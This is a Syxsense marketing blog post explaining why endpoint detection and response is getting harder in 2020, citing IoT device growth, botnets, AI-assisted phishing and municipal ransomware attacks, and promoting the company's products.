Cyber-attackers are not exactly the kind of folks who will limit their intrusions to business hours. Whatever they are up to—from monetary gain to state-sponsored intrusion—bad actors are always on the lookout for weak spots to take advantage of. IoT endpoints are among their favorites. Your organization deserves an EDR solution that is as constantly active—and aggressive—as cybercriminals are.

Syxsense Secure and Manage both provide enterprise users with the sort of always-on protection that is necessary to mitigate the broad spectrum of cybersecurity threats out there today. By allowing for comprehensive and real-time visibility into all endpoint activity, reporting on device inventory, quickly quarantining detected threats, and automatically patching all of your devices—be they Windows, Mac, or Linux—Syxsense solutions represent an efficient and meticulous approach to information-security needs.

[vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fsyxsense-trial|||” css=”.vc_custom_1572936982710{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Why Endpoint Detection and Response is Getting Harder in 2020

By Patch ManagementNo Comments

Why Endpoint Detection and Response is Getting Harder in 2020

As the severity of cyberthreats increases, the demand for endpoint detection and response solutions across the globe is growing.
[vc_empty_space]
[vc_single_image image=”36847″ img_size=”full”]

The demand for endpoint detection and response solutions across the globe is currently quite strong, with no signs of slowdown any time soon: Recent research by London-based firm Technavio predicts that the market for this type of cybersecurity software will grow by $7.67 billion between 2020 and 2024, representing a compound annual growth rate of 10%.

Why such robust growth in this space? The answer is both simple and unfortunately discomforting. It’s becoming more difficult for businesses, government departments and other organizations to feel secure with the endpoint protections they have in place.

No wonder, given that the severity (and sheer number) of cyberthreats out there is constantly growing. Today, we’ll take a look at what challenges organizations aiming to bolster the effectiveness of their information security may face — and how they might be able to overcome such hurdles.

More Devices = More Potential Weaknesses

Analysis from the researchers at Gartner projected in August 2019 that there would be 5.8 billion open endpoints to the internet of things around the world by the end of the following year: a 21% uptick from 2019’s number.

There’s no denying the utility and communicability that the IoT fosters for so many, but while marveling at those positive attributes you must also note the risks it poses. As the number of endpoints increases across your network — both inside and outside of the IoT realm — so do the potential points of weakness.

In fact, Infosecurity magazine reported in October 2019 that there had been more than 100 million attacks on IoT-connected devices in the first half of that year. Applications run on such devices can be particularly vulnerable.

According to TechRadar, facing up to the security threat represented by IoT device proliferation requires use of an endpoint security solution that can offer comprehensive visibility of all internal and external vulnerabilities. This vigilance must be constant and in real time.

Mounting Danger of New and Established Cyberthreats

IoT-focused cyberattacks, while relatively new in the cyberthreat landscape, have already done plenty of damage, with Wired citing the Mirai and Reaper botnet attacks of 2016 and 2017, respectively, as major examples of such malicious campaigns. The latter of those infected more than 1 million networks. The new versions of the threats coming through IoT endpoints will have the ability to be even more devastating, manifesting as complex dedicated denial of service attacks.

Other attack styles that are even more well-established, like phishing, are becoming even more dangerous in similar ways, according to Security Boulevard. Malicious actors have diversified and variegated the former’s capabilities so that these social engineering scams are no longer confined to emails that are relatively easy to detect: They can be deployed via text messages and even phone calls. AI plays a significant role here, as hackers are using it to mimic an organization’s in-house jargon and speech and thus make phishing expeditions harder to discover.

Last but not least, ransomware looks to pose a more grave threat than ever before. The extortionists using this malware saw plenty of success in 2019, attacking local governments all over the U.S., including Atlanta, Baltimore and New Orleans.

In one particularly brazen, widespread attack, hackers simultaneously hit the municipal networks of 22 Texas cities and towns, disabling countless web-based civic services and operations.

Although not all of those attacks netted hackers the ransom sums they demanded, the disturbing effectiveness of such efforts has likely emboldened cyber attackers, so bigger and more devastating ransomware campaigns are surely on the horizon for 2020. The same is almost certainly true for IoT-based and social engineering attacks. Only the strongest, most versatile threat detection and solutions will be capable of meeting major cyberthreats head-on, be they new attack types or updated versions of old standbys.

The Need for Quicker Responses to Threats

Opinions vary on how long it takes cyber attackers to breach a target that they’ve picked to bear the brunt of their hacks. Some say it falls between 15 and 10 hours, while others consider it more a matter of minutes, according to TechTarget. Either way, that’s an effectively minuscule time frame.

In an interview with Dark Reading, Dan Basile, executive director of security operations at Texas A&M University, noted that it while it’s ideal to find cyberthreats before they can do any harm — like removing a tumor before cancer metastasizes uncontrollably — this perfect-world plan of action isn’t always possible. Therefore the focus switches to quickly directing infosec defenses at a detected threat before permanent damage occurs. EDR needs to be a part of a quick-response strategy, along with application firewalls, network traffic analysis and other systems.

EDR Can’t Do It Alone

That last sentence in the section above represents another key point: EDR is (and will continue to be) more difficult if you expect it to carry the weight of all infosec responsibilities on its own. It must be deployed in concert with firewalls, encryption, multi-factor authentication, threat hunting and other tools. The support of an organizational culture aware of and focused on the gravity of contemporary cybersecurity threats is also essential.

Choosing Syxsense as your EDR solution gives businesses a considerable head start on their journey to crafting a reliably secure environment for your digital assets. Coupled with our comprehensive managed IT and patch management services, Syxsense can provide your organization the peace of mind it deserves. Contact us today to learn more or sign up for a free trial.

[vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fsyxsense-trial|||” css=”.vc_custom_1572936982710{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]